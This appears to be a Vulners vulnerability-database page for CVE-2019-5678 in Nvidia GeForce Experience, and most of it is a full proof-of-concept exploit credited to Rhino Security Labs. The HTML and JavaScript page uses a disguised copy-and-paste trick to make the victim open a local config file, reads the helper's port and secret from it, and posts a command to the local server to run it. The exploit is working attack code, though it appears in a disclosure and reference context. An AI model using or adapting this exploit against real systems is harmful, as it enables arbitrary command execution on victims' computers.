Vulners
Lucene search
Nvidia GeForce Experience Web Helper - Command Injection
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Nvidia GeForce Experience Web Helper - Command Injection Exploit | 7 Jun 201900:00 | – | zdt |
 | CVE-2019-5678 | 3 Jun 201916:23 | – | circl |
 | NVIDIA GeForce Experience Web Helper Component Input Validation Vulnerability | 31 May 201900:00 | – | cnvd |
 | CVE-2019-5678 | 31 May 201921:12 | – | cve |
 | CVE-2019-5678 | 31 May 201921:12 | – | cvelist |
 | EUVD-2019-15253 | 7 Oct 202500:30 | – | euvd |
 | Nvidia GeForce Experience Web Helper - Command Injection | 3 Jun 201900:00 | – | exploitpack |
 | NVIDIA GeForce Experience - May 2019 - Lenovo Support US | 10 Jun 201915:17 | – | lenovo |
| NVIDIA GeForce Experience - May 2019 - Lenovo Support US | 10 Jun 201915:17 | – | lenovo |
 | GeForce Experience OS command injection-vulnerability warning-the black bar safety net | 10 Jun 201900:00 | – | myhack58 |
10
<!--
POC for CVE‑2019‑5678 Nvidia GeForce Experience OS command injection via a web browser
Author: David Yesland -- Rhino Security Labs
-->
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</head>
<body>
<script>
//Send request to local GFE server
function submitRequest(port,secret)
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text\/html");
xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret);
var body = "\""+document.getElementById("cmd").value+"\"";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
$(document).on('change', '.file-upload-button', function(event) {
var reader = new FileReader();
reader.onload = function(event) {
var jsonObj = JSON.parse(event.target.result);
submitRequest(jsonObj.port,jsonObj.secret);
}
reader.readAsText(event.target.files[0]);
});
//Copy text from some text field
function myFunction() {
var copyText = document.getElementById("myInput");
copyText.select();
document.execCommand("copy");
}
//trigger the copy and file window on ctrl press
$(document).keydown(function(keyPressed) {
if (keyPressed.keyCode == 17) {
myFunction();document.getElementById('file-input').click();
}
});
</script>
<h2>
Press CTRL+V+Enter
</h2>
<!--Command to run in a hidden input field-->
<input type="hidden" value="calc.exe" id="cmd" size="55">
<!--Hidden text box to copy text from-->
<div style="opacity: 0.0;">
<input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json"
id="myInput" size="1">
</div>
<!--file input-->
<input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" />
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2019 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 24.6
CVSS 37.8
EPSS0.00358